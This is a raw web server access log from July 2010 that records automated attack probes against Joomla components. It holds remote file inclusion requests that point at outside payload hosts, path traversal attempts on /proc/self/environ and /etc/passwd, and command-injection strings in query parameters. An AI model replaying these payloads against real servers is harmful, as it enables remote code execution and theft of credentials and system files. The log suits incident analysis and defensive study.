84.217.73.155 - - [27/Jul/2010:14:21:31 +0200] "GET //index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
174.121.192.28 - - [27/Jul/2010:14:21:56 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.810"
174.121.192.28 - - [27/Jul/2010:14:21:57 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.810"
81.93.3.182 - - [27/Jul/2010:14:21:57 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:14:21:57 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.808"
84.217.73.155 - - [27/Jul/2010:14:23:09 +0200] "GET /logs/access_log//index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:14:23:09 +0200] "GET //index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:14:23:10 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
99.198.108.74 - - [27/Jul/2010:14:24:20 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.831"
99.198.108.74 - - [27/Jul/2010:14:24:20 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.831"
121.78.118.123 - - [27/Jul/2010:14:24:33 +0200] "GET /logs/access_log//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:14:24:34 +0200] "GET //index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
121.78.118.123 - - [27/Jul/2010:14:24:35 +0200] "GET /logs//index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
217.65.2.151 - - [27/Jul/2010:14:24:38 +0200] "GET /logs//index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:24:38 +0200] "GET //index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.836"
99.198.108.74 - - [27/Jul/2010:14:26:09 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.831"
99.198.108.74 - - [27/Jul/2010:14:26:24 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.831"
217.65.2.151 - - [27/Jul/2010:14:28:10 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.836"
84.217.73.155 - - [27/Jul/2010:14:28:30 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
174.121.240.147 - - [27/Jul/2010:14:29:16 +0200] "GET /logs/access_log/////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:14:29:16 +0200] "GET /////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:14:29:16 +0200] "GET /logs/////index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-" "libwww-perl/5.810"
65.13.185.104 - - [27/Jul/2010:14:29:32 +0200] "GET //index.php?option=com_juliaportfolio&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
188.165.213.8 - - [27/Jul/2010:14:29:40 +0200] "GET /logs/access_log/index.php?option=com_qcontacts&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:14:29:40 +0200] "GET /index.php?option=com_qcontacts&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
188.165.213.8 - - [27/Jul/2010:14:29:40 +0200] "GET /logs/index.php?option=com_qcontacts&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
72.37.150.18 - - [27/Jul/2010:14:29:41 +0200] "GET /logs/access_log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://necessary.juan.or.kr//necessary/public_html/id1.txt?? HTTP/1.1" 404 378 "-" "stealth solo"
72.37.150.18 - - [27/Jul/2010:14:29:41 +0200] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://necessary.juan.or.kr//necessary/public_html/id1.txt?? HTTP/1.1" 404 367 "-" "stealth solo"
72.37.150.18 - - [27/Jul/2010:14:29:41 +0200] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://necessary.juan.or.kr//necessary/public_html/id1.txt?? HTTP/1.1" 404 362 "-" "stealth solo"
72.37.150.18 - - [27/Jul/2010:14:29:41 +0200] "GET /logs/access_log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 378 "-" "stealth solo"
72.37.150.18 - - [27/Jul/2010:14:29:41 +0200] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 362 "-" "stealth solo"
72.37.150.18 - - [27/Jul/2010:14:29:41 +0200] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 367 "-" "stealth solo"
94.23.215.207 - - [27/Jul/2010:14:32:36 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:14:32:36 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:14:32:42 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:14:32:43 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:14:33:02 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:14:33:02 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:33:05 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:14:33:14 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:14:33:14 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
64.15.156.75 - - [27/Jul/2010:14:35:26 +0200] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 330 "-" "Mozilla/5.0"
64.15.156.75 - - [27/Jul/2010:14:35:26 +0200] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 335 "-" "Mozilla/5.0"
64.15.156.75 - - [27/Jul/2010:14:35:31 +0200] "GET /logs/access_log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 346 "-" "Mozilla/5.0"
213.229.106.147 - - [27/Jul/2010:14:38:04 +0200] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:14:38:04 +0200] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:14:38:04 +0200] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
91.121.67.226 - - [27/Jul/2010:14:38:44 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.803"
91.121.67.226 - - [27/Jul/2010:14:38:44 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
119.192.145.144 - - [27/Jul/2010:14:38:51 +0200] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:14:39:32 +0200] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
99.198.108.74 - - [27/Jul/2010:14:39:44 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.831"
99.198.108.74 - - [27/Jul/2010:14:39:49 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.831"
213.229.106.147 - - [27/Jul/2010:14:41:10 +0200] "GET /logs/access_log//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:14:41:11 +0200] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:14:41:11 +0200] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
174.121.192.28 - - [27/Jul/2010:14:47:18 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.810"
174.121.192.28 - - [27/Jul/2010:14:47:18 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.810"
91.121.67.226 - - [27/Jul/2010:14:48:46 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.803"
91.121.67.226 - - [27/Jul/2010:14:48:46 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.803"
67.195.112.178 - - [27/Jul/2010:14:48:55 +0200] "GET /?C=N;O=D HTTP/1.0" 200 559 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.21.78.22 - - [27/Jul/2010:14:49:12 +0200] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:14:49:12 +0200] "GET //index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:14:49:21 +0200] "GET /logs//index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
81.21.78.22 - - [27/Jul/2010:14:49:21 +0200] "GET //index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
81.93.3.182 - - [27/Jul/2010:14:49:45 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.808"
81.93.3.182 - - [27/Jul/2010:14:49:45 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.808"
78.41.233.128 - - [27/Jul/2010:14:49:53 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.805"
78.41.233.128 - - [27/Jul/2010:14:49:53 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.805"
110.45.147.240 - - [27/Jul/2010:14:50:03 +0200] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 330 "-" "Mozilla/5.0"
110.45.147.240 - - [27/Jul/2010:14:50:03 +0200] "GET /logs/access_log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 346 "-" "Mozilla/5.0"
110.45.147.240 - - [27/Jul/2010:14:50:03 +0200] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 335 "-" "Mozilla/5.0"
99.198.108.74 - - [27/Jul/2010:14:50:08 +0200] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 796 "-" "libwww-perl/5.831"
99.198.108.74 - - [27/Jul/2010:14:50:08 +0200] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 559 "-" "libwww-perl/5.831"
119.192.145.144 - - [27/Jul/2010:14:52:45 +0200] "GET /logs/access_log//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:14:52:45 +0200] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:14:52:46 +0200] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
217.65.2.151 - - [27/Jul/2010:14:53:25 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:53:25 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:53:25 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.836"
125.141.91.138 - - [27/Jul/2010:14:53:33 +0200] "GET /logs/access_log//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:14:53:34 +0200] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:14:53:34 +0200] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 301 "-" "libwww-perl/5.805"
174.121.240.147 - - [27/Jul/2010:14:57:12 +0200] "GET /logs/access_log//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:14:57:12 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:14:57:12 +0200] "GET /logs//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-" "libwww-perl/5.810"
157.181.180.23 - - [27/Jul/2010:14:57:36 +0200] "POST /contact.php HTTP/1.1" 404 297 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
157.181.180.23 - - [27/Jul/2010:14:57:40 +0200] "POST /contact.php HTTP/1.1" 404 297 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
72.37.150.18 - - [27/Jul/2010:15:00:54 +0200] "GET //index.php?option=com_properties&controller=http://necessary.juan.or.kr//necessary/public_html/id1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:15:00:54 +0200] "GET /logs//index.php?option=com_properties&controller=http://necessary.juan.or.kr//necessary/public_html/id1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:15:00:54 +0200] "GET /logs/access_log//index.php?option=com_properties&controller=http://necessary.juan.or.kr//necessary/public_html/id1.txt?? HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:15:00:54 +0200] "GET //index.php?option=com_properties&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:15:00:54 +0200] "GET /logs//index.php?option=com_properties&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:15:00:54 +0200] "GET /logs/access_log//index.php?option=com_properties&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 312 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:15:01:32 +0200] "GET /logs/access_log%20%20//index.php?option=com_properties&controller=http://necessary.juan.or.kr//necessary/public_html/id1.txt?? HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:15:01:33 +0200] "GET /logs//index.php?option=com_properties&controller=http://necessary.juan.or.kr//necessary/public_html/id1.txt?? HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:15:01:33 +0200] "GET //index.php?option=com_properties&controller=http://necessary.juan.or.kr//necessary/public_html/id1.txt?? HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:15:01:33 +0200] "GET /logs/access_log%20%20//index.php?option=com_properties&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 314 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:15:01:33 +0200] "GET /logs//index.php?option=com_properties&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 301 "-" "MaMa CaSpEr"
72.37.150.18 - - [27/Jul/2010:15:01:33 +0200] "GET //index.php?option=com_properties&controller=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 296 "-" "MaMa CaSpEr"
84.217.73.155 - - [27/Jul/2010:15:02:35 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:15:02:35 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:15:02:35 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
65.13.185.104 - - [27/Jul/2010:15:05:11 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.805"
212.52.166.12 - - [27/Jul/2010:15:17:54 +0200] "GET /logs/access_log//index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:17:54 +0200] "GET //index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:17:55 +0200] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
174.121.240.147 - - [27/Jul/2010:15:22:07 +0200] "GET /logs/access_log//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:15:22:07 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
